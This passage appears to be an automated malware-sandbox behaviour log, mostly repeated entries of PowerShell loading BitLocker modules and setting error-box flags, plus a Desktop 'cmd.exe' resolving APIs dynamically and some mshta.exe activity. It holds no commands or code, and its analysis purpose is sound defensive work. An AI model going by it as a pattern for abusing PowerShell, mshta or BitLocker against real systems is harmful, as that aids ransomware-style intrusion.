              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AEF5820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF70AEF5820
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
